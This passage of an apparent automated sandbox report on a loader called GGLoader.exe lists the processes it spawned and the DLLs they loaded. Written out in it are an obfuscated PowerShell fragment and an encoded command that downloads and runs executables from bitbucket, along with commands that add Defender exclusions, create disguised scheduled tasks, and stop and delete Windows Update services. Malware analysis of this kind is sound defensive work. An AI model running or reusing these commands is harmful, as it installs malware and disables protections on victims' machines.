har](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC
8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe"
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: propsys.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: edputil.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: slc.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sppc.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
